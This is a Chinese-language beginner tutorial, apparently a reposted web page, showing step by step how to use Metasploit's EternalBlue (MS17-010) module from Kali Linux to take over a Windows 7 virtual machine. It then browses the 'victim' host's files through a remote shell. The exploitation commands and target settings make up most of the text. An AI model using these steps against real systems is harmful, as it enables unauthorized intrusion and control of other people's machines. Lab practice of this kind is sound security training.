一、背景介绍

Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!

二、资源装备

1.安装好 Win7的虚拟机一台

2.整装待发的小白一个。

3.安装好的Kali Linux虚拟机一台。

三、攻防实战

3.1 利用Metasploit(msf)渗透框架对目标主机进行攻击,如下图所示。

步骤1:启动Metasploit(msf)渗透框架,如下图所示。

命令:msfconsole

win7系统管理员权限(如何获取计算机管理员权限)(1)

步骤2:Metasploit(msf)渗透框架启动成功,如下图所示。

win7系统管理员权限(如何获取计算机管理员权限)(2)

步骤3:检索漏洞,如下图所示。

命令:search 漏洞编号

例子:search ms17-010

win7系统管理员权限(如何获取计算机管理员权限)(3)

步骤4:检索到有关漏洞的利用模块如下图所示。

步骤5:选择对应的漏洞利用模块并使用,如下图所示。

命令:use 漏洞利用模块名称

例子:use exploit/windows/smb/ms17_010_eternalblue

win7系统管理员权限(如何获取计算机管理员权限)(4)

步骤6:查看使用的漏洞模块需要设置的参数,如下图所示。。

命令:show option

步骤7:设置攻击参数,如下图所示。

命令:set rhosts 受害者主机IP

例子:set rhosts 192.168.78.160

win7系统管理员权限(如何获取计算机管理员权限)(5)

步骤8:查看对应的参数是否设置成功,如下图所示。

命令:show options

win7系统管理员权限(如何获取计算机管理员权限)(6)

步骤9:运行漏洞利用模块,如下图所示。

命令:run

win7系统管理员权限(如何获取计算机管理员权限)(7)

步骤10:如下图所示,成功拿下目标主机

提示:ETERNALBLUE overwrite completed successfully!

win7系统管理员权限(如何获取计算机管理员权限)(8)

3.2 进入后渗透阶段,利用DOS命令控制目标主机,如下图所示。

步骤1:进入Windows系统的cmd窗口,如下图所示。

win7系统管理员权限(如何获取计算机管理员权限)(9)

步骤2:利用命令查看受害者主机的文件夹信息,如下图所示。

命令:dir

切换文件夹目录:cd 文件夹名

切换盘符:cd 盘符名

win7系统管理员权限(如何获取计算机管理员权限)(10)

win7系统管理员权限(如何获取计算机管理员权限)(11)

win7系统管理员权限(如何获取计算机管理员权限)(12)